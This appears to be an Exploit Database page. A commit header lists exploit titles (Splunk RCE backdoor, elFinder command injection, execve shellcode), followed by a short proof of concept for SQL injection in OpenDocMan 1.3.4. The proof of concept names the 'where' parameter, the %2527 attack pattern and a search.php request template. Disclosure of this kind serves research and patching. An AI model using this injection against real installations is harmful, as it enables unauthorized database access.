dd4f02248d
2 changes to exploits/shellcodes STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2) Splunk Enterprise 7.2.4 - Custom App RCE (Persistent Backdoor - Custom Binary Payload) Splunk Enterprise 7.2.4 - Custom App Remote Command Execution (Persistent Backdoor / Custom Binary) elFinder 2.1.47 - Command Injection vulnerability in the PHP connector elFinder 2.1.47 - 'PHP connector' Command Injection OpenDocMan 1.3.4 - 'search.php where' SQL Injection Linux/x86 - NOT Encoder / Decoder - execve() /bin/sh Shellcode (44 bytes) Linux/x86 - NOT Encoder / Decoder - execve(/bin/sh) Shellcode (44 bytes) Linux/x86 - XOR Encoder / Decoder execve() /bin/sh Shellcode (45 bytes)
22 lines
No EOL
1.1 KiB
Text
22 lines
No EOL
1.1 KiB
Text
===========================================================================================
|
||
# Exploit Title: OpenDocMan 1.3.4 - ’where’ SQL Injection
|
||
# CVE: N/A
|
||
# Date: 05/03/2019
|
||
# Exploit Author: Mehmet EMIROGLU
|
||
# Vendor Homepage: https://sourceforge.net/projects/opendocman/files/
|
||
# Software Link: https://sourceforge.net/projects/opendocman/files/
|
||
# Version: v1.3.4
|
||
# Category: Webapps
|
||
# Tested on: Wamp64, @Win
|
||
# Software description: OpenDocMan is a web based document management
|
||
system (DMS) written in PHP designed
|
||
to comply with ISO 17025 and OIE standard for document management.
|
||
It features fine grained control of access to files, and automated
|
||
install and upgrades.
|
||
===========================================================================================
|
||
# POC - SQLi
|
||
# Parameters : where
|
||
# Attack Pattern : %2527
|
||
# GET Request :
|
||
http://localhost/opendocman/search.php?submit=submit&sort_by=id&where=[SQL Inject Here]&sort_order=asc&keyword=Training Manual&exact_phrase=on
|
||
=========================================================================================== |